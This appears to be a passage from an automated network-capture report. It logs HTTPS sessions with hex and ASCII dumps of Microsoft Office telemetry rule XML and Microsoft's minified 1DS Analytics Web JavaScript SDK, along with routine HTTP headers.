                                                  2024-12-09 08:35:23 UTC16384INData Raw: 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20
                                                  Data Ascii: <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V
                                                  2024-12-09 08:35:23 UTC16384INData Raw: 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54
                                                  Data Ascii: 20v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="T
                                                  2024-12-09 08:35:23 UTC16384INData Raw: 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d
                                                  Data Ascii: T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F=
                                                  2024-12-09 08:35:23 UTC16384INData Raw: 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a
                                                  Data Ascii: alse"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C>
                                                  2024-12-09 08:35:23 UTC16384INData Raw: 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70
                                                  Data Ascii: I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="Cleanup
                                                  2024-12-09 08:35:23 UTC16384INData Raw: 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20
                                                  Data Ascii: </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R>
                                                  2024-12-09 08:35:23 UTC16384INData Raw: 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C>
                                                  2024-12-09 08:35:23 UTC16384INData Raw: 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" />
                                                  2024-12-09 08:35:23 UTC16384INData Raw: 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20
                                                  Data Ascii: <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" />


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  33192.168.2.44979513.107.246.634435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:22 UTC384OUTGET /scripts/c/ms.analytics-web-3.2.12.min.js HTTP/1.1
                                                  Host: js.monitor.azure.com
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:35:23 UTC817INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:23 GMT
                                                  Content-Type: text/javascript; charset=utf-8
                                                  Content-Length: 140189
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=31536000, immutable, no-transform
                                                  Last-Modified: Wed, 24 May 2023 19:47:31 GMT
                                                  ETag: 0x8DB5C8FB67C42C8
                                                  x-ms-request-id: 7661e183-801e-005a-3415-4aa638000000
                                                  x-ms-version: 2009-09-19
                                                  x-ms-meta-jssdkver: 3.2.12
                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                  Access-Control-Allow-Origin: *
                                                  x-azure-ref: 20241209T083523Z-r1cf579d778mpnwnhC1EWRfgng00000001m0000000003n2c
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  X-Cache-Info: L1_T2
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:23 UTC15567INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 20 53 44 4b 20 41 6e 61 6c 79 74 69 63 73 20 57 65 62 2c 20 33 2e 32 2e 31 32 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 75 3d 22 66 75 6e 63 74 69 6f 6e 22 2c 73 3d 22 6f 62 6a 65 63 74 22 2c 66 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 2c 66 3d 22 70 72 6f 74 6f 74 79 70 65 22 2c 6c 3d 22 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 22 2c 67 3d
                                                  Data Ascii: /*! * 1DS JS SDK Analytics Web, 3.2.12 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */var e=this,t=function(n){"use strict";var u="function",s="object",fe="undefined",f="prototype",l="hasOwnProperty",g=
                                                  2024-12-09 08:35:23 UTC16384INData Raw: 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 69 66 28 6a 69 29 74 72 79 7b 72 65 74 75 72 6e 20 6a 69 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 31 7d 63 61 74 63 68 28 69 29 7b 7d 7d 28 74 2c 65 2e 69 64 2c 6e 29 26 26 28 74 5b 65 2e 69 64 5d 3d 6e 29 7d 63 61 74 63 68 28 69 29 7b 7d 7d 72 65 74 75 72 6e 20 6e 7d 28 61 2c 65 29 29 5b 78 74 28 74 29 5d 3d 6e 29 2c 6e 29 7d 2c 6b 69 6c 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 65 26 26 65 5b 74 5d 29 74 72 79 7b 64 65 6c 65 74 65 20 65 5b 74 5d 7d 63 61 74 63 68 28 6e 29 7b 7d 7d 7d 3b 72 65 74 75 72 6e 20 61 7d 76 61 72 20 65 72 3d 22 74 6f 47 4d 54 53 74 72 69 6e 67 22 2c 74 72 3d 22 74 6f 55 54 43 53 74
                                                  Data Ascii: tion(e,t,n){if(ji)try{return ji(e,t,{value:n,enumerable:!1,configurable:!0}),1}catch(i){}}(t,e.id,n)&&(t[e.id]=n)}catch(i){}}return n}(a,e))[xt(t)]=n),n)},kill:function(e,t){if(e&&e[t])try{delete e[t]}catch(n){}}};return a}var er="toGMTString",tr="toUTCSt
                                                  2024-12-09 08:35:23 UTC16384INData Raw: 74 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 7d 2c 65 5b 69 74 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 7d 2c 65 29 29 2c 76 5b 4d 61 5d 3d 72 29 2c 72 7d 2c 76 5b 67 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 26 26 72 5b 67 65 5d 28 65 29 7d 2c 76 5b 76 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 26 26 72 5b 76 65 5d 28 65 29 7d 2c 76 2e 67 65 74 43 6f 6f 6b 69 65 4d 67 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 3d 69 7c 7c 6d 72 28 54 2c 76 5b 59 5d 29 7d 2c 76 2e 73 65 74 43 6f 6f 6b 69 65 4d 67 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 3d 65 7d 2c 76 5b 63 74 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 6e 7c 7c 61 7c 7c 24 74 28 54 2e 65 6e 61 62 6c 65 50 65 72 66 4d 67 72
                                                  Data Ascii: t]=function(e,t){},e[it]=function(e,t){},e)),v[Ma]=r),r},v[ge]=function(e){r&&r[ge](e)},v[ve]=function(e){r&&r[ve](e)},v.getCookieMgr=function(){return i=i||mr(T,v[Y])},v.setCookieMgr=function(e){i=e},v[ct]=function(){var e;return n||a||$t(T.enablePerfMgr
                                                  2024-12-09 08:35:23 UTC16384INData Raw: 28 65 2c 74 2c 6e 29 7b 73 63 28 69 2c 65 2c 74 2c 6e 29 7d 2c 21 30 29 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 69 74 65 6d 3a 72 7d 7d 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 73 63 28 65 2c 74 2c 6e 2c 69 29 7b 69 66 28 69 26 26 65 29 7b 76 61 72 20 72 3d 54 6f 28 69 2e 76 61 6c 75 65 2c 69 2e 6b 69 6e 64 2c 69 2e 70 72 6f 70 65 72 74 79 54 79 70 65 29 3b 69 66 28 2d 31 3c 72 29 7b 76 61 72 20 61 3d 65 5b 72 63 5d 2c 6f 3d 28 6f 3d 28 61 3d 61 7c 7c 28 65 5b 72 63 5d 3d 7b 66 3a 7b 7d 7d 29 29 5b 61 63 5d 29 7c 7c 28 61 5b 61 63 5d 3d 7b 7d 29 3b 69 66 28 74 29 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 74 2e 6c 65
                                                  Data Ascii: (e,t,n){sc(i,e,t,n)},!0),JSON.stringify(e)},function(){return{item:r}})}catch(e){return null}}})}function sc(e,t,n,i){if(i&&e){var r=To(i.value,i.kind,i.propertyType);if(-1<r){var a=e[rc],o=(o=(a=a||(e[rc]={f:{}}))[ac])||(a[ac]={});if(t)for(var c=0;c<t.le
                                                  2024-12-09 08:35:23 UTC16384INData Raw: 20 6c 2e 73 65 74 49 6e 69 74 69 61 6c 69 7a 65 64 28 21 31 29 2c 6f 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 63 6f 72 65 43 6f 6e 66 69 67 3a 63 2c 63 6f 72 65 3a 75 2c 65 78 74 65 6e 73 69 6f 6e 73 3a 73 7d 7d 29 7d 2c 6c 2e 70 72 6f 63 65 73 73 54 65 6c 65 6d 65 74 72 79 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 4e 6f 28 65 2c 6c 2e 69 64 65 6e 74 69 66 69 65 72 29 3b 76 61 72 20 6e 3d 28 74 3d 6c 2e 5f 67 65 74 54 65 6c 43 74 78 28 74 29 29 2e 67 65 74 45 78 74 43 66 67 28 6c 2e 69 64 65 6e 74 69 66 69 65 72 29 2c 69 3d 21 21 77 2e 64 69 73 61 62 6c 65 54 65 6c 65 6d 65 74 72 79 3b 28 6e 3f 69 7c 7c 6e 2e 64 69 73 61 62 6c 65 54 65 6c 65 6d 65 74 72 79 3a 69 29 7c 7c 52 7c 7c 28 77 5b 41 63 5d 26 26 28 65 2e 69 4b 65 79 3d 77
                                                  Data Ascii: l.setInitialized(!1),o}},function(){return{coreConfig:c,core:u,extensions:s}})},l.processTelemetry=function(e,t){No(e,l.identifier);var n=(t=l._getTelCtx(t)).getExtCfg(l.identifier),i=!!w.disableTelemetry;(n?i||n.disableTelemetry:i)||R||(w[Ac]&&(e.iKey=w
                                                  2024-12-09 08:35:23 UTC16384INData Raw: 2c 74 29 2c 74 26 26 74 2e 73 65 74 54 72 61 63 65 43 74 78 26 26 74 2e 73 65 74 54 72 61 63 65 43 74 78 28 6f 2e 67 65 74 54 72 61 63 65 43 74 78 28 29 29 7d 2c 61 2e 70 72 6f 63 65 73 73 54 65 6c 65 6d 65 74 72 79 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 4e 6f 28 65 2c 61 2e 69 64 65 6e 74 69 66 69 65 72 29 2c 74 3d 61 2e 5f 67 65 74 54 65 6c 43 74 78 28 74 29 3b 76 61 72 20 6e 2c 69 2c 72 3d 65 2e 65 78 74 3d 65 2e 65 78 74 7c 7c 7b 7d 3b 65 2e 64 61 74 61 3d 65 2e 64 61 74 61 7c 7c 7b 7d 2c 74 65 28 42 75 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 5b 65 5d 3d 72 5b 65 5d 7c 7c 7b 7d 7d 29 2c 6f 26 26 28 6f 2e 61 70 70 6c 79 41 70 70 6c 69 63 61 74 69 6f 6e 43 6f 6e 74 65 78 74 28 65 29 2c 6f 2e 61 70 70 6c 79 55 73 65 72 43 6f 6e 74 65 78 74 28 65
                                                  Data Ascii: ,t),t&&t.setTraceCtx&&t.setTraceCtx(o.getTraceCtx())},a.processTelemetry=function(e,t){No(e,a.identifier),t=a._getTelCtx(t);var n,i,r=e.ext=e.ext||{};e.data=e.data||{},te(Bu,function(e){r[e]=r[e]||{}}),o&&(o.applyApplicationContext(e),o.applyUserContext(e
                                                  2024-12-09 08:35:23 UTC16384INData Raw: 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 69 29 2c 69 3d 6e 75 6c 6c 2c 6e 3d 72 2e 73 6c 69 63 65 28 30 29 2c 72 3d 5b 5d 2c 74 65 28 6e 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 28 29 7d 29 29 7d 7d 29 7d 76 61 72 20 62 66 3d 33 36 65 35 2c 43 66 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 61 64 73 62 6f 74 2d 67 6f 6f 67 6c 65 22 2c 22 61 70 69 73 2d 67 6f 6f 67 6c 65 22 2c 22 6d 65 64 69 61 70 61 72 74 6e 65 72 73 2d 67 6f 6f 67 6c 65 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 45 66 28 29 7b 76 61 72 20 65 3d 63 69 28 29 3b 72 65 74 75 72 6e 20 65 26 26 21 21 65 2e 74 69 6d 69 6e 67 7d 66 75 6e 63 74 69 6f 6e 20 53 66 28 29 7b 76 61 72 20 65 3d 63 69 28 29 2c 65 3d 65 3f 65 2e 74 69 6d 69 6e 67 3a 30 3b 72 65 74 75 72 6e 20 65 26 26 30 3c 65 2e 64 6f 6d 61
                                                  Data Ascii: (clearTimeout(i),i=null,n=r.slice(0),r=[],te(n,function(e){e()}))}})}var bf=36e5,Cf=["googlebot","adsbot-google","apis-google","mediapartners-google"];function Ef(){var e=ci();return e&&!!e.timing}function Sf(){var e=ci(),e=e?e.timing:0;return e&&0<e.doma
                                                  2024-12-09 08:35:23 UTC16384INData Raw: 70 65 72 74 69 65 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 69 2c 72 2c 61 3b 65 2e 76 65 72 3d 22 31 2e 30 22 2c 65 2e 69 64 3d 74 68 69 73 2e 5f 69 64 2e 67 65 74 4c 61 73 74 50 61 67 65 56 69 65 77 49 64 28 29 2c 73 65 28 65 2e 6e 61 6d 65 29 7c 7c 28 65 2e 6e 61 6d 65 3d 28 6e 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2c 74 26 26 74 2e 70 61 67 65 4e 61 6d 65 3f 74 2e 70 61 67 65 4e 61 6d 65 3a 6e 2e 63 61 6c 6c 62 61 63 6b 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 2e 63 61 6c 6c 62 61 63 6b 2e 70 61 67 65 4e 61 6d 65 3f 6e 2e 63 61 6c 6c 62 61 63 6b 2e 70 61 67 65 4e 61 6d 65 28 29 3a 6e 2e 63 6f 72 65 44 61 74 61 26 26 6e 2e 63 6f 72 65 44 61 74 61 2e 70 61 67 65 4e 61 6d 65 3f 6e 2e 63 6f 72 65 44 61 74
                                                  Data Ascii: perties=function(e,t){var n,i,r,a;e.ver="1.0",e.id=this._id.getLastPageViewId(),se(e.name)||(e.name=(n=this._config,t&&t.pageName?t.pageName:n.callback&&"function"==typeof n.callback.pageName?n.callback.pageName():n.coreData&&n.coreData.pageName?n.coreDat
                                                  2024-12-09 08:35:23 UTC9934INData Raw: 69 62 75 74 65 28 74 68 69 73 2e 5f 63 6f 6e 74 65 6e 74 42 6c 6f 62 46 69 65 6c 64 4e 61 6d 65 73 2e 74 65 6d 70 6c 61 74 65 4e 61 6d 65 29 2c 63 6f 6e 74 65 6e 74 53 6f 75 72 63 65 3a 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 68 69 73 2e 5f 63 6f 6e 74 65 6e 74 42 6c 6f 62 46 69 65 6c 64 4e 61 6d 65 73 2e 63 6f 6e 74 65 6e 74 53 6f 75 72 63 65 29 2c 70 72 6f 64 75 63 74 3a 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 68 69 73 2e 5f 63 6f 6e 74 65 6e 74 42 6c 6f 62 46 69 65 6c 64 4e 61 6d 65 73 2e 70 72 6f 64 75 63 74 49 64 29 2c 74 79 70 65 3a 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 68 69 73 2e 5f 63 6f 6e 74 65 6e 74 42 6c 6f 62 46 69 65 6c 64 4e 61 6d 65 73 2e 63 6f 6e 74 65 6e 74 54 79 70 65 29 7d 7d 2c 4e 64 2e 70 72 6f 74 6f 74 79
                                                  Data Ascii: ibute(this._contentBlobFieldNames.templateName),contentSource:e.getAttribute(this._contentBlobFieldNames.contentSource),product:e.getAttribute(this._contentBlobFieldNames.productId),type:e.getAttribute(this._contentBlobFieldNames.contentType)}},Nd.prototy


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  34192.168.2.44979913.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:25 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:25 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:25 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 450
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
